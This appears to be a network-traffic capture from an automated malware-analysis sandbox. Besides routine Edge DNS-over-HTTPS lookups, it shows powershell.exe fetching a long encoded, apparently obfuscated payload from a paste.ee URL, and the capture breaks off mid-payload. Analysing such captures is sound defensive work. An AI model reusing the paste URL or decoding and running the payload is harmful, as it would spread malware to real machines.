2025-01-05 07:32:41 UTC	1390	IN	Data Raw: 28 a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d Data Ascii: ( 1v=K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']
2025-01-05 07:32:41 UTC	1390	IN	Data Raw: 01 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F
2025-01-05 07:32:41 UTC	1390	IN	Data Raw: 3f 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e Data Ascii: ??AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN
2025-01-05 07:32:41 UTC	1390	IN	Data Raw: 4f 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 Data Ascii: ODsQNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49764	162.159.61.3	443	5252	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 07:32:40 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-05 07:32:40 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-05 07:32:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 05 Jan 2025 07:32:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8fd1c69bd8eac420-EWR alt-svc: h3=":443"; ma=86400
2025-01-05 07:32:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 28 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom(#)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49765	172.64.41.3	443	5252	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 07:32:40 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-05 07:32:40 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-05 07:32:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 05 Jan 2025 07:32:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8fd1c69bed94ef9d-EWR alt-svc: h3=":443"; ma=86400
2025-01-05 07:32:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2c 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom,()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49766	172.64.41.3	443	5252	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 07:32:41 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-05 07:32:41 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-05 07:32:41 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 05 Jan 2025 07:32:41 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8fd1c69e0df580dc-EWR alt-svc: h3=":443"; ma=86400
2025-01-05 07:32:41 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 4b 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomK c)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49767	172.64.41.3	443	5252	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 07:32:42 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-05 07:32:42 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-05 07:32:42 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 05 Jan 2025 07:32:42 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8fd1c6a49f929e05-EWR alt-svc: h3=":443"; ma=86400
2025-01-05 07:32:42 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1d 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49903	188.114.96.3	443	6036	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 07:33:16 UTC	67	OUT	GET /d/5VcuL/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
2025-01-05 07:33:17 UTC	1236	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 07:33:17 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0WdS3i70d1r5C1YeplrrPSkGJYhnEwOdcVgCAfSThFg7%2FK%2BpCwC3yNsEVWoj0v3px8LXcp98%2BRYiZJc1Sfg7X0354vnjKdHbmvbHB33RicltYBN%2FKxiw%2FjZqtw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd1c77aa97743f3-EWR alt-svc: h3=":443"; ma=86400
2025-01-05 07:33:17 UTC	216	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 36 36 26 6d 69 6e 5f 72 74 74 3d 31 35 36 30 26 72 74 74 5f 76 61 72 3d 35 39 38 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 35 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 38 30 38 30 34 39 26 63 77 6e 64 3d 32 31 33 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 66 64 31 36 33 64 63 62 31 65 66 35 36 35 32 63 26 74 73 3d 31 32 37 34 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1560&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2815&recv_bytes=681&delivery_rate=1808049&cwnd=213&unsent_bytes=0&cid=fd163dcb1ef5652c&ts=1274&x=0"
2025-01-05 07:33:17 UTC	1286	IN	Data Raw: 31 66 37 66 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 34 7a 44 32 38 77 4c 50 63 79 44 66 38 67 46 50 4d 78 44 4c 38 41 77 4f 6b 76 44 78 37 51 36 4f 41 75 44 59 37 77 7a 4f 63 6f 44 38 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a Data Ascii: 1f7fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4zD28wLPcyDf8gFPMxDL8AwOkvDx7Q6OAuDY7wzOcoD86wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNz
2025-01-05 07:33:17 UTC	1369	IN	Data Raw: 33 41 31 4e 4d 64 44 50 33 67 7a 4e 6f 63 44 45 33 67 77 4e 45 63 44 41 32 77 76 4e 73 62 44 36 32 67 74 4e 41 62 44 75 32 51 72 4e 77 61 44 6f 32 77 70 4e 4d 61 44 64 32 77 6d 4e 6f 5a 44 57 32 51 6c 4e 45 5a 44 4c 32 51 69 4e 67 59 44 45 32 77 51 4e 30 58 44 38 31 77 65 4e 6f 58 44 6b 31 67 59 4e 45 43 41 41 42 51 47 41 47 41 4d 41 41 41 77 4f 6f 74 44 5a 77 41 44 41 41 41 41 45 41 59 41 73 41 73 44 4d 37 67 69 4f 55 72 44 30 36 77 73 4f 59 71 44 65 36 77 6c 4f 38 6f 44 4f 36 67 69 4f 51 6b 44 32 35 67 63 4f 73 6d 44 71 35 67 59 4f 45 6d 44 67 35 77 48 41 41 41 41 4d 41 59 41 67 41 67 44 67 34 77 48 4f 41 63 44 2f 33 67 2f 4e 73 66 44 36 33 51 2b 4e 67 66 44 33 33 67 39 4e 55 66 44 30 33 77 38 4e 49 66 44 78 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 Data Ascii: 3A1NMdDP3gzNocDE3gwNEcDA2wvNsbD62gtNAbDu2QrNwaDo2wpNMaDd2wmNoZDW2QlNEZDL2QiNgYDE2wQN0XD81weNoXDk1gYNECAABQGAGAMAAAwOotDZwADAAAAEAYAsAsDM7giOUrD06wsOYqDe6wlO8oDO6giOQkD25gcOsmDq5gYOEmDg5wHAAAAMAYAgAgDg4wHOAcD/3g/NsfD63Q+NgfD33g9NUfD03w8NIfDx3A8N8eDu3Q7NweD
2025-01-05 07:33:17 UTC	1369	IN	Data Raw: 51 69 4f 63 6f 44 46 36 77 67 4f 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77 2f 4e 30 66 44 37 33 51 2b 4e 63 66 44 31 33 77 38 4e 73 64 44 5a 33 77 31 4e 55 64 44 54 33 51 30 4e 38 63 44 4e 33 77 79 4e 6b 63 44 48 33 51 78 4e 4d 63 44 42 32 77 76 4e 30 62 44 37 32 51 75 4e 63 62 44 31 Data Ascii: QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD72QuNcbD1
2025-01-05 07:33:17 UTC	1369	IN	Data Raw: 55 4e 41 56 44 4f 31 41 54 4e 6f 55 44 49 31 67 52 4e 51 55 44 43 31 41 41 4e 34 54 44 38 30 67 4f 4e 67 54 44 32 30 41 4e 4e 49 54 44 77 30 67 4c 4e 77 53 44 71 30 41 4b 4e 59 53 44 6b 30 67 49 4e 41 53 44 65 30 41 48 4e 6f 52 44 59 30 67 46 4e 51 52 44 53 30 41 45 4e 34 51 44 4d 30 67 43 4e 67 51 44 47 30 41 42 4e 49 51 44 41 7a 67 2f 4d 77 50 44 36 7a 41 2b 4d 59 50 44 30 7a 67 38 4d 41 50 44 75 7a 41 37 4d 6f 4f 44 6f 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c 44 34 79 67 74 4d 51 4c 44 79 79 41 73 4d 34 4b 44 73 79 67 71 4d 67 4b 44 6d 79 41 70 4d 49 4b 44 67 79 67 6e 4d 77 4a 44 61 79 41 6d 4d 59 4a 44 55 79 Data Ascii: UNAVDO1ATNoUDI1gRNQUDC1AAN4TD80gONgTD20ANNITDw0gLNwSDq0AKNYSDk0gINASDe0AHNoRDY0gFNQRDS0AEN4QDM0gCNgQDG0ABNIQDAzg/MwPD6zA+MYPD0zg8MAPDuzA7MoODozg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMoLD4ygtMQLDyyAsM4KDsygqMgKDmyApMIKDgygnMwJDayAmMYJDUy
2025-01-05 07:33:17 UTC	1369	IN	Data Raw: 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 51 45 4f 41 68 44 50 34 67 44 4f 30 67 44 4d 34 77 43 4f 6f 67 44 4a 34 41 43 4f 63 67 44 47 34 51 42 4f 51 67 44 41 33 77 2f 4e 34 66 44 39 33 41 2f 4e 73 66 44 36 33 51 2b 4e 67 66 44 33 33 67 39 4e 55 66 44 77 33 77 37 4e 34 65 44 74 33 41 37 4e 73 65 44 71 33 51 36 4e 67 65 44 6e 33 67 35 4e 55 65 44 6b 33 77 34 4e 49 65 44 68 33 41 34 4e 38 64 44 65 33 51 33 4e 77 64 44 62 33 67 32 4e 6b 64 44 59 33 77 31 4e 59 64 44 50 33 67 7a 4e 30 63 44 49 33 77 78 4e 59 63 44 46 33 41 Data Ascii: OEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4QEOAhDP4gDO0gDM4wCOogDJ4ACOcgDG4QBOQgDA3w/N4fD93A/NsfD63Q+NgfD33g9NUfDw3w7N4eDt3A7NseDq3Q6NgeDn3g5NUeDk3w4NIeDh3A4N8dDe3Q3NwdDb3g2NkdDY3w1NYdDP3gzN0cDI3wxNYcDF3A
2025-01-05 07:33:17 UTC	1309	IN	Data Raw: 4e 67 54 4f 31 38 45 4e 31 54 44 68 7a 30 35 4d 38 4e 44 42 79 4d 75 4d 4e 4c 44 6c 79 34 53 4d 2f 48 54 31 78 77 47 4d 55 43 7a 52 41 41 41 41 51 42 51 42 41 41 77 50 4e 2f 7a 75 2f 49 6a 50 73 33 7a 34 36 59 69 4f 65 6f 6a 46 36 34 67 4f 48 67 6a 51 34 59 77 4e 30 66 6a 34 33 41 39 4e 2b 65 54 43 30 41 79 4d 68 50 7a 7a 7a 30 37 4d 72 4f 54 6d 7a 63 34 4d 31 4e 7a 59 7a 45 31 4d 2f 4d 54 4c 7a 73 78 4d 4a 49 54 78 79 45 72 4d 68 4a 6a 57 79 38 68 4d 4a 45 7a 31 78 73 63 4d 63 47 7a 6a 78 45 56 4d 77 45 6a 4a 78 4d 42 4d 70 44 44 34 77 6b 4e 4d 58 43 44 6b 77 59 46 4d 41 42 54 4b 77 49 43 41 41 41 41 64 41 51 41 38 41 38 54 2b 2f 45 2f 50 55 2f 6a 78 2f 63 37 50 33 39 54 58 39 55 55 50 58 77 6a 36 38 67 4e 50 41 7a 7a 74 38 6f 7a 4f 7a 74 44 58 37 38 30 Data Ascii: NgTO18EN1TDhz05M8NDByMuMNLDly4SM/HT1xwGMUCzRAAAAQBQBAAwPN/zu/IjPs3z46YiOeojF64gOHgjQ4YwN0fj43A9N+eTC0AyMhPzzz07MrOTmzc4M1NzYzE1M/MTLzsxMJITxyErMhJjWy8hMJEz1xscMcGzjxEVMwEjJxMBMpDD4wkNMXCDkwYFMABTKwICAAAAdAQA8A8T+/E/PU/jx/c7P39TX9UUPXwj68gNPAzzt8ozOztDX780
